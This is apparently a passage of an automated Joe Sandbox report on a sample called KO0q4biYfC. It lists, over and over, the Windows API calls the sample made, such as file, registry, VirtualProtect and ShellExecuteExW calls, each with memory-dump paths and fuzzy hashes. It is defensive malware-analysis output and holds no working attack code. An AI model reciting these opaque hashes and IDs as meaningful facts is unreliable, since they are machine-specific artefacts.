                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                              • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                              • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                              • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004059A2
                                              • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 004059B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                              • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                              • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                              • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                              APIs
                                              • CreateFileA.KERNELBASE(00000000), ref: 73C62B6B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2c9d53e2edf26176e4d7c6dd775db2b15c36f8365879e2b60f4952cca72c20a0
                                              • Instruction ID: 29237586ee0fd1c977998becfed925c38256cdb3e120682d29f631b6883c8ec8
                                              • Opcode Fuzzy Hash: 2c9d53e2edf26176e4d7c6dd775db2b15c36f8365879e2b60f4952cca72c20a0
                                              • Instruction Fuzzy Hash: AB41A3B2800748EFEB21EF66DEC57593779FB44354F34442AE609CE244DB35D8858B92
                                              APIs
                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FileMove
                                              • String ID:
                                              • API String ID: 3562171763-0
                                              • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                              • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                              • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                              • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FilePointerwsprintf
                                              • String ID:
                                              • API String ID: 327478801-0
                                              • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                              • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                              • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                              • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                              APIs
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringWrite
                                              • String ID:
                                              • API String ID: 390214022-0
                                              • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                              • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                              • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                              • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                              APIs
                                              • SearchPathW.KERNELBASE(?,00000000,?,?,?,?,000000FF), ref: 00401749
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: PathSearch
                                              • String ID:
                                              • API String ID: 2203818243-0
                                              • Opcode ID: d36677f8d2e559cb387ccec067656e7046d6eb767eaf07478cee85b9d292eaec
                                              • Instruction ID: 3617ef58ccd7aa140dffe44bfab91b8a7bb5611f18f48832d751fbee8bc5d3eb
                                              • Opcode Fuzzy Hash: d36677f8d2e559cb387ccec067656e7046d6eb767eaf07478cee85b9d292eaec
                                              • Instruction Fuzzy Hash: AAE0DF72700100EBE710DFA4DE48EAA33A8DF40368B30823AF611B60D0E6B4A9419B3D
                                              APIs
                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                              • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                              • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                              APIs
                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                              • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                              • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                              APIs
                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F00B,0040CED0,004033DE,0040CED0,0040F00B,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                              • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                              • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                              APIs
                                              • VirtualProtect.KERNELBASE(73C6505C,?,?,73C6504C), ref: 73C629B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 30f7da4f50a63e2fbb71b3348c54385fb79cbec620c90940b32f31423560f8f7
                                              • Instruction ID: 5a844b6aa41885f25e5a9178b606548d212b1c6d2601b7991046fb00412cc441
                                              • Opcode Fuzzy Hash: 30f7da4f50a63e2fbb71b3348c54385fb79cbec620c90940b32f31423560f8f7
                                              • Instruction Fuzzy Hash: 57F092F2504AC1DEC390EF2B85847093BE0BB09204F34452AE39CDE285E334C848CB91
                                              APIs
                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: PrivateProfileString
                                              • String ID:
                                              • API String ID: 1096422788-0
                                              • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                              • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                              • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                              • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062E3,?,00000000,?,?,Call,?), ref: 00406279
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                              • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                              • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015AE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: a6d18c98ee21f5be52796325d469c1a2d185cd06dd69ecfff736ff996b69b5af
                                              • Instruction ID: 5499d889e10e12284ba9d0e0803ee079e3e67a5a0dd97beb148b5d1e1bc1fcbb
                                              • Opcode Fuzzy Hash: a6d18c98ee21f5be52796325d469c1a2d185cd06dd69ecfff736ff996b69b5af
                                              • Instruction Fuzzy Hash: E7D01232B04100D7DB10DBA4AF4899D73A49B44369B304677E502F11D0D6B9D9519A2D
                                              APIs
                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                              • Instruction ID: f8057fa4cd378f1a8adf26ed8b17c038a4feeda265d9f6fa174188bdeaa95141
                                              • Opcode Fuzzy Hash: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                              • Instruction Fuzzy Hash: 1FC04C71780200BADA208BA49D85F0677545790700F1495797640E50E4C674D460D66C
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                              APIs
                                              • ShellExecuteExW.SHELL32(?), ref: 00405A23
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
